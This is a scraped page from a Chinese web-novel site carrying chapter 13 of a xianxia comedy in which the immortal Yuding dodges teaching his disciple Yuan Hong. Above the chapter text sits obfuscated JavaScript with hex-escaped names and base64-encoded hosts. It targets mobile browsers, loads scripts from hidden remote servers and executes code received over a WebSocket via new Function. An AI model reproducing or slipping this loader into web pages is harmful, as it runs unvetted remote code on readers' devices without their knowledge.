笔趣阁

字:
关灯 护眼
笔趣阁 > 别让玉鼎再收徒了 > 第13章 师父,弟子悟了
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第13章 师父,弟子悟了

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
“对,天赋,而且是个人天赋。”
  玉鼎说着意味深长的看了袁洪一眼:“我阐教弟子悟性根骨品行皆是上等,至于你……”
  师父为什么这么看着我?
  难道我的根骨很差吗?
  袁洪看着玉鼎的目光,心中七上八下,紧张起来。
  玉鼎点头肯定道:“还不错!”
  这倒不是他胡说八道。
  封神中袁洪不仅修成了八九玄功,还可以与阐教三代第一人的杨戬不分高下。
  因此悟性根骨方面,自然不用多说。
  袁洪松了口气幽怨看了眼玉鼎。
  师父,有话就不能一口气说完,非得让他来个大喘气?
  然后他看到一旁的青云。
  袁洪忽然若有所思,他知道这小鬼从哪学来吊人胃口的毛病了。
  “行了,徒弟,如今你想寻的道修的仙都已在你的手中,接下来就去自行参悟吧!”
  玉鼎挥手道:“至于你从中可以悟得多少就全看你的悟性和造化了。”
  袁洪一怔,忙道:“师父难道不替弟子讲讲吗?”
  哪知玉鼎摇头晃脑长吟道:“难!难!难!道最玄,莫把长生作等闲,不遇缘人传妙诀,空言口困舌头干。”
  师父这是什么意思?
  袁洪脸上一震眉头皱起,低头细细思索起来。
  玉鼎见状心中满意的笑了。
  菩提老祖说的这话就是我听着那也是相当的有水平,用来震一下这白猿刚好。
  好好悟一下吧徒弟!
  片刻后袁洪忽然脸色一白,仿佛受到了什么巨大的打击:“师父的意思是弟子非有缘人,给弟子讲道是浪费口舌么?”
  好家伙,这悟岔到什么地方了。
  玉鼎嘴角微微抽搐,道:“非也,有人传道讲缘字,但为师传道却讲一个悟字。”
  “悟?”袁洪一怔。
  “不错,为师给你讲道也没问题,可为师讲给你的道那是你自己的吗,不是,那是为师的。”
  玉鼎严肃道:“以为师的水准教你长生不老修成一个仙人道果你觉得有问题吗?完全没有问题吧?”
  袁洪怔怔的点了点头。
  “爬过山吗?”玉鼎问道。
  袁洪怔怔的点了点头。
  “那就好,这修炼之路正如登山,而成仙不过是仙路的开始。
  为师传了你法门妙诀就等于领着你来到了这座山下给了你上山的工具。
  至于怎么上山,走哪条路,这些都由你自己决定。”
  玉鼎严肃道:“要是为师给你讲了那就等于带着你选了为师走的这条路,这样你就走不出自己的路了。
  你可知道,你走不出自己的路会有什么结果?”
  袁洪一愣:“弟子不知,请师父告知。”
  玉鼎叹息道:“那你未来的高度最多只能爬到为师这里,而永远无法超过为师,现在懂了么?”
  袁洪闻言若有所思的点点头。
  懂了?
  懂了就赶紧自己去悟啊!
  玉鼎心中嘀咕一声,要知道他自己都没练明白呢又怎么能当师父讲课?
  说白了,当他靠徒弟就得自学。
  想了想袁洪摇了摇头道:“莫说只能达到师尊的高度,就算达成师尊高度的十分二三弟子都心满意足了。”
  说到最后他的脸上露出向往之色。
  这是他的心里话。
  玉虚宫十二金仙在三界辈分极高,个个神通广大法力高强。
  在他心中眼前的玉鼎真人就是一座巍峨伟岸的神山,散发光辉,高不可攀。
  只可远观,不可近看。
  因为一走近你就会越发的感觉到这座山的高大和神圣,自己的渺小和卑微,实在太打击人的自信心了。
  如今有幸拜玉鼎真人为师,这是他袁洪精诚所至金石为开,几辈子修来的福气。
  达到玉鼎高度?
  开什么玩笑,这不就跟蚂蚁说它要长大变成神龙,可能吗?
  这样的念头他想不敢想。
  再退一步讲,玉鼎真人什么高度,他的十之二三是什么水平?最不济也到仙人的境界了吧。
  你说都成仙了他还有什么不满足的?
  玉鼎:“……”
  合着他这半天的忽悠,不是,是劝说徒弟要学会自学成才是白浪费感情了?
  袁洪笑着将天书递上道:“所以,还是请师父替我讲讲吧!”
  “袁洪,你太令为师失望了。”
  玉鼎忽然一脸失望道:“既然这样,那你还来修什么仙,寻什么道,趁早打道回府做你的妖去吧。”
  说罢下了云床一把拿过天书,失望的瞥了眼袁洪一眼后径直离去。
  只是一道失望的目光,就落在袁洪眼中就像脑中炸了一个闷雷,脸色瞬间苍白,失魂落魄的僵在原地。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师